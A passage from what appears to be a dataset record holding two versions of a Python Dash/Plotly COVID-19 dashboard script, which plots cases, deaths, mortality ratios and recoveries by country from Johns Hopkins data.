'borderpad': 1,\n 'bgcolor': '#ffffff', 'opacity': 0.6}\n fig100.append(trace)\n anno.append(a)\n fig100.append(go.Scatter(x=list(np.arange(deaths_100_start[\n 'Days Since 100 Deaths'].max())), y=[(100 * math.exp(0.2310491 *\n i)) for i in list(np.arange(deaths_100_start[\n 'Days Since 100 Deaths'].max()))], name=\n 'Deaths Double Every 3 Days', mode='lines', opacity=0.25, line=\n dict(color='grey', width=3, dash='dash'), text=[\n '# of Deaths Double Every 3 Days'], hovertemplate=\n '<b>Deaths Double Every 3 Days</b>', showlegend=True))\n fig100.append(go.Scatter(x=list(np.arange(deaths_100_start[\n 'Days Since 100 Deaths'].max())), y=[(100 * math.exp(0.099021 *\n i)) for i in list(np.arange(deaths_100_start[\n 'Days Since 100 Deaths'].max()))], name=\n 'Deaths Double Every 7 Days', mode='lines', opacity=0.25, line=\n dict(color='grey', width=3, dash='dot'), text=[\n '# of Deaths Double Every 7 Days'], hovertemplate=\n '<b>Deaths Double Every 7 Days</b>', showlegend=True))\n layout_global = go.Layout(yaxis={'title': 'Number of Deaths',\n 'range': [np.log10(100), np.log10(cases_1000_start['Deaths'].\n max() * 1.1)], 'type': 'log', 'fixedrange': True, 'linewidth': \n 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1,\n 'showline': True, 'mirror': False}, title='Overall Deaths',\n xaxis={'title': 'Days Since First 100 deaths', 'range': [0,\n deaths_100_start['Days Since 100 Deaths'].max()], 'fixedrange':\n True, 'linewidth': 2, 'linecolor': 'black', 'showgrid': False,\n 'showline': True, 'mirror': False}, height=750, hovermode=\n 'closest', annotations=anno)\n fig_global = {'data': fig100, 'layout': layout_global}\n return fig_global\n elif select_global == '% Mortality by Confirmed Cases (Top 20 Countries)':\n figmort = []\n anno = []\n m = mort.sort_values(by=['Confirmed'], ascending=False).head(20)\n m = m.sort_values(by=['Mortality_Percent'], ascending=True\n ).reset_index()\n for i in range(len(m)):\n m1 = m.loc[i, 'Country_Region']\n m2 = m.loc[i, 'Mortality_Percent']\n trace = go.Bar(name='Observed Case - Mortality Ratio', x=[m2],\n y=[m1], text=[round(m.loc[i, 'Mortality_Percent'], 2)],\n orientation='h', textposition='auto', marker=dict(color=\n '#FFB000', opacity=0.6, line=dict(color=\n 'rgba(255,176,0, 1)', width=1)), hovertemplate=\n '<b>%{y}</b><br>' +\n '<br>Observed Case Mortaility Pct: %{text}&#37;<br>',\n showlegend=False)\n figmort.append(trace)\n layout_global = go.Layout(yaxis={'title': 'Country / Region',\n 'fixedrange': True, 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Observed Case - Mortality Ratio', xaxis={'title':\n '% Mortality by Confirmed Cases (Top 20 Countries)', 'range': [\n 0, m['Mortality_Percent'].max() + 2], 'fixedrange': True,\n 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor':\n 'black'}, height=750, hovermode='closest')\n fig_global = {'data': figmort, 'layout': layout_global}\n return fig_global\n elif select_global == 'Recoveries vs. Deaths By Country':\n figscat = []\n rc = mort.loc[(mort['Deaths'] >= 100) & (mort['Recovered'] >= 100)\n ].reset_index()\n for i in range(len(rc)):\n scat = go.Scatter(x=[rc.loc[i, 'Deaths']], y=[rc.loc[i,\n 'Recovered']], mode='markers+text', text=[rc.loc[i,\n 'Country_Region']], marker_color=colors_dict_global[rc.loc[\n i, 'Continent']], showlegend=False, marker=dict(size=12,\n line_width=1, opacity=0.75), hovertemplate=\n '<b>%{text}</b><br>' + '<br>Recoveries: %{y}<br>' +\n 'Deaths: %{x}<br>', textposition='bottom center', textfont=\n dict(size=10, color='rgba(0, 0, 0, 0.6)'))\n figscat.append(scat)\n figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max(\n ), 3)), y=[i for i in list(np.linspace(100, rc['Deaths'].max(),\n 3))], mode='lines', name='Deaths = Recoveries', opacity=0.25,\n line=dict(color='grey', width=1), text=[\n '# of Deaths = # of Recoveries'], hovertemplate=\n '<b># of Deaths = # of Recoveries</b>', showlegend=True))\n figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max(\n ), 3)), y=[(i * 2) for i in list(np.linspace(100, rc['Deaths'].\n max(), 3))], mode='lines', name='2 Recoveries for Every Death',\n opacity=0.25, line=dict(color='green', width=3, dash='dash'),\n text=['2 Recoveries for Every Death'], hovertemplate=\n '<b>2 Recoveries for Every Death</b>', showlegend=True))\n figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max(\n ), 3)), y=[(i / 2) for i in list(np.linspace(100, rc['Deaths'].\n max(), 3))], mode='lines', name='2 Deaths for Every Recovery',\n opacity=0.25, line=dict(color='firebrick', width=3, dash='dash'\n ), text=['2 Deaths for Every Recovery'], hovertemplate=\n '<b>2 Deaths for Every Recovery</b>', showlegend=True))\n layout_global = go.Layout(yaxis={'title': 'Number of Recoveries',\n 'fixedrange': True, 'automargin': True, 'range': [np.log10(100),\n np.log10(rc['Recovered'].max() * 1.1)], 'type': 'log',\n 'linewidth': 2, 'linecolor': 'black', 'showgrid': False,\n 'dtick': 1, 'showline': True, 'mirror': False}, title=\n 'Recoveries vs. Deaths, By Country', xaxis={'title':\n 'Number of Deaths', 'fixedrange': True, 'range': [np.log10(100),\n np.log10(rc['Deaths'].max() * 1.1)], 'type': 'log', 'linewidth':\n 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1,\n 'showline': True, 'mirror': False}, height=750, hovermode='closest'\n )\n fig_global = {'data': figscat, 'layout': layout_global}\n return fig_global\n\n\n@app.callback([Output(component_id='main-dropdown-2', component_property=\n 'options'), Output(component_id='btext1', component_property='children'\n ), Output(component_id='subplot1', component_property='figure'), Output\n (component_id='btext2', component_property='children'), Output(\n component_id='subplot2', component_property='figure'), Output(\n component_id='btext3', component_property='children'), Output(\n component_id='subplot3', component_property='figure')], [Input(\n component_id='main-dropdown', component_property='value')])\ndef update_country(selected_country):\n if selected_country is None:\n selected_country = 'Canada'\n options = ['Confirmed', 'Recovered', 'Deaths',\n 'Total and Daily Confirmed Cases']\n vals = [{'label': i, 'value': i} for i in options]\n trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6\n ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'].tail(45\n ), y=final_df.loc[final_df['Country_Region'] ==\n selected_country, 'Confirmed_Diff'].tail(45).rolling(window=5).\n mean(), mode='lines', line=dict(color='#648FFF', width=3))]\n layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Confirmed Cases: {0} (Last 45 Days)'.format(\n selected_country), xaxis={'type': 'date', 'automargin': True,\n 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor':\n 'black'}, height=300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6),\n go.Scatter(name='5 Day Moving Average', x=final_df.loc[final_df\n ['Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines',\n line=dict(color='#DC267F', width=3))]\n layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Deaths: {0} (Last 45 Days)'.format(selected_country),\n xaxis={'type': 'date', 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=\n 300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n trace_3 = [go.Bar(name='Daily Recoveries', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6\n ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'].tail(45\n ), y=final_df.loc[final_df['Country_Region'] ==\n selected_country, 'Recovered_Diff'].tail(45).rolling(window=5).\n mean(), mode='lines', line=dict(color='#009E73', width=3))]\n layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Recovered: {0} (Last 45 Days)'.format(selected_country),\n xaxis={'type': 'date', 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=\n 300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n return vals, final_df.loc[(final_df['Date'] == final_df['Date'].max\n ()) & (final_df['Country_Region'] == selected_country),\n 'Confirmed_Diff'], {'data': trace_1, 'layout': layout_t1\n }, final_df.loc[(final_df['Date'] == final_df['Date'].max()) &\n (final_df['Country_Region'] == selected_country), 'Deaths_Diff'], {\n 'data': trace_2, 'layout': layout_t2}, final_df.loc[(final_df[\n 'Date'] == final_df['Date'].max()) & (final_df['Country_Region'\n ] == selected_country), 'Recovered_Diff'], {'data': trace_3,\n 'layout': layout_t3}\n else:\n options = ['Confirmed', 'Recovered', 'Deaths',\n 'Total and Daily Confirmed Cases']\n vals = [{'label': i, 'value': i} for i in options]\n trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6\n ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'].tail(45\n ), y=final_df.loc[final_df['Country_Region'] ==\n selected_country, 'Confirmed_Diff'].tail(45).rolling(window=5).\n mean(), mode='lines', line=dict(color='#648FFF', width=3))]\n layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Confirmed Cases: {0} (Last 45 Days)'.format(\n selected_country), xaxis={'type': 'date', 'automargin': True,\n 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor':\n 'black'}, height=300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6),\n go.Scatter(name='5 Day Moving Average', x=final_df.loc[final_df\n ['Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines',\n line=dict(color='#DC267F', width=3))]\n layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Deaths: {0} (Last 45 Days)'.format(selected_country),\n xaxis={'type': 'date', 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=\n 300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n trace_3 = [go.Bar(name='Daily Recoveries', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6\n ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'].tail(45\n ), y=final_df.loc[final_df['Country_Region'] ==\n selected_country, 'Recovered_Diff'].tail(45).rolling(window=5).\n mean(), mode='lines', line=dict(color='#009E73', width=3))]\n layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Recovered: {0} (Last 45 Days)'.format(selected_country),\n xaxis={'type': 'date', 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=\n 300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n return vals, final_df.loc[(final_df['Date'] == final_df['Date'].max\n ()) & (final_df['Country_Region'] == selected_country),\n 'Confirmed_Diff'], {'data': trace_1, 'layout': layout_t1\n }, final_df.loc[(final_df['Date'] == final_df['Date'].max()) &\n (final_df['Country_Region'] == selected_country), 'Deaths_Diff'], {\n 'data': trace_2, 'layout': layout_t2}, final_df.loc[(final_df[\n 'Date'] == final_df['Date'].max()) & (final_df['Country_Region'\n ] == selected_country), 'Recovered_Diff'], {'data': trace_3,\n 'layout': layout_t3}\n\n\n@app.callback(Output(component_id='box-1', component_property='figure'), [\n Input(component_id='main-dropdown', component_property='value'), Input(\n component_id='main-dropdown-2', component_property='value')])\ndef update_maingraph(selected_country, selected_graph):\n if selected_graph is None and selected_country is None:\n selected_country = 'Canada'\n figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'], y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'], marker_color='#648FFF')]\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [\n 0, final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Overall Progression of COVID-19: {0}'.format(str(\n selected_country)), hovermode='x unified', xaxis=dict(title=\n 'Date', fixedrange=True, automargin=True, showline=True, mirror\n =False, linewidth=2, linecolor='black'))\n return {'data': figmain_t, 'layout': figmain_l}\n elif selected_graph is None and selected_country is not None:\n figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'], y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'], marker_color='#648FFF')]\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [\n 0, final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Overall Progression of COVID-19: {0}'.format(str(\n selected_country)), hovermode='x unified', xaxis=dict(title=\n 'Date', fixedrange=True, automargin=True, showline=True, mirror\n =False, linewidth=2, linecolor='black'))\n return {'data': figmain_t, 'layout': figmain_l}\n elif selected_graph == 'Total and Daily Confirmed Cases':\n figmain_t = [go.Scatter(name='Total Confirmed Cases', x=final_df.\n loc[final_df['Country_Region'] == selected_country, 'Date'], y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'], line=dict(color='#1A85FF', width=1.5), mode=\n 'lines'), go.Scatter(name='Daily Confirmed Cases', x=final_df.\n loc[final_df['Country_Region'] == selected_country, 'Date'], y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed_Diff'], line=dict(color='#D41159', width=3), mode=\n 'lines', fill='tozeroy')]\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [\n 0, final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Overall Progression of COVID-19 ({0}): {1}'.format(str(\n selected_country), str(selected_graph)), hovermode='x unified',\n xaxis=dict(title='Date', fixedrange=True, automargin=True,\n showline=True, mirror=False, linewidth=2, linecolor='black'))\n return {'data': figmain_t, 'layout': figmain_l}\n else:\n cols_dict = {'Confirmed': '#648FFF', 'Deaths': '#DC267F',\n 'Recovered': '#009E73'}\n figmain_t = [go.Bar(name='Total {0}'.format(selected_graph), x=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Date'], y=final_df.loc[final_df['Country_Region'] ==\n selected_country, selected_graph], marker_color=cols_dict[\n selected_graph])]\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [\n 0, final_df.loc[final_df['Country_Region'] == selected_country,\n selected_graph].max() * 1.1], 'automargin': True, 'showline': \n True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'},\n title='Overall Progression of COVID-19 ({0}): {1}'.format(str(\n selected_country), str(selected_graph)), hovermode='x unified',\n xaxis=dict(title='Date', fixedrange=True, automargin=True,\n showline=True, mirror=False, linewidth=2, linecolor='black'))\n return {'data': figmain_t, 'layout': figmain_l}\n\n\nif __name__ == '__main__':\n app.run_server()\n", "step-5": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Apr 10 01:03:35 2020\r\n\r\n@author: Jordan\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom datetime import date\r\n## from COVID19_Simple import *\r\nfrom COVID19_Diff import calc_diff_country\r\n### Dash Stuff ###\r\nimport dash\r\nimport dash_core_components as dcc\r\nimport dash_html_components as html\r\nfrom dash.dependencies import Input, Output\r\nimport plotly.graph_objects as go\r\nimport math\r\n\r\n### Initial Code Block; Set Up Data ###\r\nurls = ['https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_confirmed_global.csv',\r\n 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_deaths_global.csv',\r\n 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series/time_series_covid19_recovered_global.csv']\r\n\r\n\r\n### Base Country Data (and Transformations)\r\nfinal_df = pd.read_csv('C:/Users/Jordan/Documents/COVID19/final_df.csv')\r\nfinal_df = calc_diff_country(final_df)\r\nfinal_df['Date'] = pd.to_datetime(final_df['Date'])\r\n\r\nfinal_df['Country_Region'] = final_df['Country_Region'].astype(str)\r\n\r\n\r\n### 1000 Cases, 10 Deaths, 10 Recovered ### (Global)\r\n## 1000 Cases ##\r\ncases_1000_start = final_df.loc[(final_df['Confirmed'] >= 1000) & (final_df['Country_Region'] != 'Cruise Ship')].groupby(['Country_Region']).min()['Date']\r\ncases_1000_start = cases_1000_start.reset_index()\r\ncases_1000_start = cases_1000_start.rename(columns={\"Date\":\"Start_Date\"})\r\nfinal_df['Country_Region'] = final_df['Country_Region'].str.strip()\r\ncases_1000_start = pd.merge(cases_1000_start,final_df, on = ['Country_Region'],how='right')\r\ncases_1000_start['Start_Date'] = pd.to_datetime(cases_1000_start['Start_Date'])\r\ncases_1000_start['Date'] = pd.to_datetime(cases_1000_start['Date'])\r\ncases_1000_start = cases_1000_start[cases_1000_start['Start_Date'].notna()]\r\ncases_1000_start['Days Since 1000 Cases'] = (cases_1000_start['Date'] - cases_1000_start['Start_Date']).dt.days\r\n\r\n\r\n## 100 Deaths ##\r\ndeaths_100_start = final_df.loc[(final_df['Deaths'] >= 100) & (final_df['Country_Region'] != 'Cruise Ship')].groupby(['Country_Region']).min()['Date']\r\ndeaths_100_start = deaths_100_start.reset_index()\r\ndeaths_100_start = deaths_100_start.rename(columns={\"Date\":\"Start_Date\"})\r\nfinal_df['Country_Region'] = final_df['Country_Region'].str.strip()\r\ndeaths_100_start = pd.merge(deaths_100_start,final_df, on = ['Country_Region'],how='right')\r\ndeaths_100_start['Start_Date'] = pd.to_datetime(deaths_100_start['Start_Date'])\r\ndeaths_100_start['Date'] = pd.to_datetime(deaths_100_start['Date'])\r\ndeaths_100_start = deaths_100_start[deaths_100_start['Start_Date'].notna()]\r\ndeaths_100_start['Days Since 100 Deaths'] = (deaths_100_start['Date'] - deaths_100_start['Start_Date']).dt.days\r\n\r\n## Mortality Ratios ##\r\nmort = final_df.groupby(['Country_Region'])['Date'].max().reset_index()\r\nmort = pd.merge(mort, final_df, on=['Country_Region', 'Date'], how='left')\r\nmort['Mortality_Percent'] = (mort['Deaths'] / mort['Confirmed'])*100.00\r\n\r\n\r\ncolors_dict_global = {'Europe':'#1D6996','Asia':'#CC503E','Africa':'#94346E', 'North America':'#38A6A5', 'Middle East': '#EDAD08', 'South America':'#E17C05', 'Caribbean & Central America':'#0F8554', 'Oceania':'#73AF48'}\r\n\r\n### Dash Portion of the Script ###\r\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\r\n\r\napp = dash.Dash(__name__, external_stylesheets=external_stylesheets)\r\nserver=app.server\r\n\r\napp.layout = html.Div(children=[\r\n html.H2(children='COVID-19 Dashboard'),\r\n html.H4(children='A Basic Dashboard to Help Track the COVID-19 Pandemic'),\r\n html.Br(),\r\n html.H5(children='Global View'),\r\n html.P(children='The Global View highlights how Covid-19 is affecting countries across the world, and how the pandemic is expanding on a country by country basis. The Global View includes the following:'),\r\n html.Div([html.Ul([html.Li([html.B('Cumulative Cases by Country Since First 1000 Cases: '),'This allows us to see how cases are spreading since the first 1000 Cases on a country by country basis']),\r\n html.Li([html.B('Cumulative Cases by Country Since First 100 Deaths: '),'This allows us to see COVID-19 fatalities since the first 100 Deaths on a country by country basis']),\r\n html.Li([html.B('Observed Case - Mortality Ratio (Top 20 Countries by Confirmed Cases): '), 'This allows us to see the percentage of COVID19 fatalities based on reported cases and deaths. (Note that reporting standards vary from country to country, so this is for illustrative purposes only)']),\r\n html.Li([html.B('Recoveries vs. Deaths By Country (Countries with over 100 deaths and 100 recoveries: '), 'This plots Recoveries against Deaths on a country by country basis. (Note that reporting standards vary from country to country, so this is for illustrative purposes only)'])])], style={'font-size': 12}),\r\n html.Br(),\r\n dcc.Dropdown(id='global-dropdown', options=[{'label':y, 'value':y} for y in ['Global Cases Trend', 'Global Deaths Trend', '% Mortality by Confirmed Cases (Top 20 Countries)','Recoveries vs. Deaths By Country']], placeholder = 'Pick Graphs From Here...'),\r\n dcc.Graph(id='global-box-1'),\r\n html.Br(),\r\n html.H5(children='Country View'),\r\n html.P('The Country view allows us to see a closer look on how the COVID-19 Pandemic has expanded. As opposed to a high level aggregation, the Country View provides a day by day time series analysis of the effects of COVID-19. The Country View includes the following:'),\r\n html.Div(style={'font-size': 12}, children=[html.Ul([html.Li([html.B('Confirmed: '), 'Cumulative Confirmed Cases of COVID-19 since January 22nd, 2020']),\r\n html.Li([html.B('Recovered: '), 'Cumulative Recovered Cases of COVID-19 since January 22nd, 2020']),\r\n html.Li([html.B('Deaths: '),'Cumulative Deaths from COVID-19 since January 22nd, 2020']),\r\n html.Li([html.B('Total and Daily Confirmed Cases: '), 'Cumulative and Daily Cases Since January 22nd, 2020. This illustrates the curve of daily cases in relation to the total cases for a country'])])]),\r\n dcc.Dropdown(id='main-dropdown', options=[{'label': x, 'value': x} for x in list(final_df.Country_Region.unique())], placeholder = 'Pick a Country From Here...'),\r\n dcc.Dropdown(id='main-dropdown-2', placeholder = 'Pick Graphs From Here...'),\r\n dcc.Graph(id='box-1'),\r\n html.Div([html.Div([html.H6(children='Most Recent New Cases'), html.H1(id='btext1'), dcc.Graph(id='subplot1')], className = 'four columns', style={'color': '#648FFF'}),\r\n html.Div([html.H6(children='Most Recent Daily Deaths'), html.H1(id='btext2'), dcc.Graph(id='subplot2')], className = 'four columns', style={'color': '#DC267F'}),\r\n html.Div([html.H6(children='Most Recent Daily Recovered'), html.H1(id='btext3'), dcc.Graph(id='subplot3')], className = 'four columns', style={'color': '#009E73', 'layout':'right'})], className=\"row\")\r\n])\r\n\r\n## Callback Functionality ## \r\n@app.callback(\r\n Output(component_id='global-box-1', component_property='figure'),\r\n [Input(component_id='global-dropdown', component_property='value')])\r\n\r\ndef global_update(select_global):\r\n if select_global == 'Global Cases Trend' or select_global is None:\r\n\r\n fig1000 = []\r\n anno = []\r\n\r\n for group, dataframe in cases_1000_start.groupby(by='Country_Region'):\r\n di = dataframe.sort_values(by=['Days Since 1000 Cases'])\r\n trace = go.Scatter(x=di['Days Since 1000 Cases'].tolist(),\r\n y=di['Confirmed'].tolist(),\r\n mode='lines',\r\n line=dict(color=colors_dict_global[list(di.loc[:, 'Continent'])[0]], width=1),\r\n opacity=0.6,\r\n text= di.Country_Region.tolist(),\r\n legendgroup=list(di.loc[:, 'Continent'])[0],\r\n hovertemplate='<b>%{text}</b><br>'+'<br>Confirmed Cases: %{y}<br>'+'Days Since First 1000 Cases: %{x}<br>',\r\n showlegend=False)\r\n\r\n a = {'x': int(di['Days Since 1000 Cases'].max()+1.5),\r\n 'y':np.log10(int(di['Confirmed'].max())),\r\n 'xref':'x', 'yref':'y',\r\n 'showarrow':False,\r\n 'text':list(di.loc[:, 'Country_Region'])[0],\r\n 'xanchor':'right', \r\n 'yanchor':'middle',\r\n 'align':'center',\r\n 'font':{'size':8, 'color':'black'},\r\n 'bordercolor':\"#ffffff\",\r\n 'borderwidth':1,\r\n 'borderpad':1,\r\n 'bgcolor':\"#ffffff\",\r\n 'opacity':0.6}\r\n\r\n fig1000.append(trace)\r\n anno.append(a)\r\n\r\n fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start['Days Since 1000 Cases'].max())),\r\n y = [1000 * (math.exp(0.2310491 * i)) for i in list(np.arange(cases_1000_start['Days Since 1000 Cases'].max()))],\r\n name='Cases Double Every 3 Days',\r\n mode='lines',\r\n opacity=.25,\r\n line = dict(color='grey', width=3, dash='dash'),\r\n text=['# of Cases Double Every 3 Days'],\r\n hovertemplate='<b>Cases Double Every 3 Days</b>',\r\n showlegend=True))\r\n\r\n fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start['Days Since 1000 Cases'].max())),\r\n y = [1000 * (math.exp(0.099021 * i)) for i in list(np.arange(cases_1000_start['Days Since 1000 Cases'].max()))],\r\n name='Cases Double Every 7 Days',\r\n mode='lines',\r\n opacity=.25,\r\n line = dict(color='grey', width=3, dash='dot'),\r\n text=['# of Cases Double Every 7 Days'],\r\n hovertemplate='<b>Cases Double Every 7 Days</b>',\r\n showlegend=True))\r\n\r\n layout_global = go.Layout(yaxis={'title':'Number of Confirmed Cases', 'range':[np.log10(1000), np.log10(cases_1000_start['Confirmed'].max() * 1.10)], 'type':'log', 'fixedrange':True, 'linewidth':2, 'linecolor':'black', 'showgrid': False, 'dtick': 1, 'showline':True, 'mirror':False},\r\n title='Overall Confirmed Cases',\r\n xaxis={'title': 'Days Since First 1000 Cases', 'range': [0, cases_1000_start['Days Since 1000 Cases'].max()], 'fixedrange':True, 'linewidth':2, 'linecolor':'black', 'showgrid': False, 'showline':True, 'mirror':False}, height=750, hovermode='closest', annotations=anno)\r\n\r\n fig_global={'data':fig1000, 'layout': layout_global}\r\n return fig_global\r\n\r\n elif select_global == 'Global Deaths Trend':\r\n fig100 = []\r\n anno = []\r\n\r\n for group, dataframe in deaths_100_start.groupby(by='Country_Region'):\r\n di = dataframe.sort_values(by=['Days Since 100 Deaths'])\r\n trace = go.Scatter(x=di['Days Since 100 Deaths'].tolist(),\r\n y=di['Deaths'].tolist(),\r\n mode='lines',\r\n line=dict(color=colors_dict_global[list(di.loc[:, 'Continent'])[0]], width=1),\r\n opacity=0.6,\r\n text= di.Country_Region.tolist(),\r\n legendgroup=list(di.loc[:, 'Continent'])[0],\r\n hovertemplate='<b>%{text}</b><br>'+'<br>Deaths: %{y}<br>'+'Days Since First 1000 Cases: %{x}<br>',\r\n showlegend=False)\r\n\r\n a={'x': int(di['Days Since 100 Deaths'].max()+1.5),\r\n 'y':np.log10(int(di['Deaths'].max())),\r\n 'xref':'x', 'yref':'y',\r\n 'showarrow':False,\r\n 'text':list(di.loc[:, 'Country_Region'])[0],\r\n 'xanchor':'right', \r\n 'yanchor':'middle',\r\n 'align':'center',\r\n 'font':{'size':8, 'color':'black'},\r\n 'bordercolor':\"#ffffff\",\r\n 'borderwidth':1,\r\n 'borderpad':1,\r\n 'bgcolor':\"#ffffff\",\r\n 'opacity':0.6}\r\n\r\n fig100.append(trace)\r\n anno.append(a)\r\n\r\n fig100.append(go.Scatter(x=list(np.arange(deaths_100_start['Days Since 100 Deaths'].max())),\r\n y = [100 * (math.exp(0.2310491 * i)) for i in list(np.arange(deaths_100_start['Days Since 100 Deaths'].max()))],\r\n name='Deaths Double Every 3 Days',\r\n mode='lines',\r\n opacity=.25,\r\n line = dict(color='grey', width=3, dash='dash'),\r\n text=['# of Deaths Double Every 3 Days'],\r\n hovertemplate='<b>Deaths Double Every 3 Days</b>',\r\n showlegend=True))\r\n\r\n fig100.append(go.Scatter(x=list(np.arange(deaths_100_start['Days Since 100 Deaths'].max())),\r\n y = [100 * (math.exp(0.099021 * i)) for i in list(np.arange(deaths_100_start['Days Since 100 Deaths'].max()))],\r\n name='Deaths Double Every 7 Days',\r\n mode='lines',\r\n opacity=.25,\r\n line = dict(color='grey', width=3, dash='dot'),\r\n text=['# of Deaths Double Every 7 Days'],\r\n hovertemplate='<b>Deaths Double Every 7 Days</b>',\r\n showlegend=True))\r\n\r\n layout_global = go.Layout(yaxis={'title':'Number of Deaths', 'range':[np.log10(100), np.log10(cases_1000_start['Deaths'].max() * 1.10)], 'type':'log', 'fixedrange':True, 'linewidth':2, 'linecolor':'black', 'showgrid': False, 'dtick': 1, 'showline':True, 'mirror':False},\r\n title='Overall Deaths',\r\n xaxis={'title': 'Days Since First 100 